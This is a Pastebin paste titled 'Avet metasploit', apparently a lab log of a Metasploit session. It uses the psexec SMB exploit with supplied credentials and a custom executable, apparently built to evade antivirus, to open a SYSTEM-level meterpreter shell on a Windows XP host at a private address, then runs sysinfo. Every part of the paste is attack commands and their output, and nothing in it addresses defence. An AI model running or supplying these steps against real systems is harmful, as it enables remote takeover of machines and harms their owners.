TVT618

Avet metasploit

Jan 28th, 2019
2,022
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. msf exploit(psexec) > use exploit/windows/smb/psexec
  2. msf exploit(psexec) > set EXE::custom /root/tools/ave/pwn.exe
  3. EXE::custom => /root/tools/ave/pwn.exe
  4. msf exploit(psexec) > set payload windows/meterpreter/bind_tcp
  5. payload => windows/meterpreter/bind_tcp
  6. msf exploit(psexec) > set rhost 192.168.116.183
  7. rhost => 192.168.116.183
  8. msf exploit(psexec) > set smbuser dax
  9. smbuser => dax
  10. msf exploit(psexec) > set smbpass test123
  11. smbpass => test123
  12. msf exploit(psexec) > set lport 8443
  13. lport => 8443
  14. msf exploit(psexec) > run
  15.  
  16. [*] 192.168.116.183:445 - Connecting to the server...
  17. [*] Started bind handler
  18. [*] 192.168.116.183:445 - Authenticating to 192.168.116.183:445 as user 'dax'...
  19. [*] Sending stage (957487 bytes) to 192.168.116.183
  20. [*] 192.168.116.183:445 - Selecting native target
  21. [*] 192.168.116.183:445 - Uploading payload...
  22. [*] 192.168.116.183:445 - Using custom payload /root/tools/avepoc/a.exe, RHOST and RPORT settings will be ignored!
  23. [*] 192.168.116.183:445 - Created \mzrCIOVg.exe...
  24. [+] 192.168.116.183:445 - Service started successfully...
  25. [*] 192.168.116.183:445 - Deleting \mzrCIOVg.exe...
  26. [-] 192.168.116.183:445 - Delete of \mzrCIOVg.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)
  27. [*] Exploit completed, but no session was created.
  28. msf exploit(psexec) > [*] Meterpreter session 4 opened (192.168.116.142:33453 -> 192.168.116.183:8443) at 2017-05-27 18:47:23 +0200
  29.  
  30. msf exploit(psexec) > sessions
  31.  
  32. Active sessions
  33. ===============
  34.  
  35. Id Type Information Connection
  36. -- ---- ----------- ----------
  37. 4 meterpreter x86/windows NT-AUTORIT_T\SYSTEM @ DAX-RYMZ48Z3EYO 192.168.116.142:33453 -> 192.168.116.183:8443 (192.168.116.183)
  38.  
  39. msf exploit(psexec) > sessions -i 4
  40. [*] Starting interaction with 4...
  41.  
  42. meterpreter > sysinfo
  43. Computer : DAX-RYMZ48Z3EYO
  44. OS : Windows XP (Build 2600, Service Pack 3).
  45. Architecture : x86
  46. System Language : de_DE
  47. Domain : ARBEITSGRUPPE
  48. Logged On Users : 2
  49. Meterpreter : x86/windows
RAW Paste Data